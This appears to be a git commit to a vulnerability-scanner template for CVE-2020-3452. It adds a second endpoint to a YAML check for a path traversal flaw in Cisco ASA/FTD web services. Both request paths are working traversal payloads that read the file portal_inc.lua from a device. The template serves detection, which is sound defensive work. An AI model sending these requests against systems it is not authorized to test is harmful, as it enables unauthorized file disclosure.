Update CVE-2020-3452.yaml

Added another endpoint that's vulnerable to the same path traversal issue
patch-1
Vidhun K 2020-10-07 15:33:36 +05:30 committed by GitHub
parent 6d7999593b
commit e6c3ec08c4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 1 additions and 0 deletions

View File

@ -11,6 +11,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../"
- "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua"
matchers:
- type: word
words: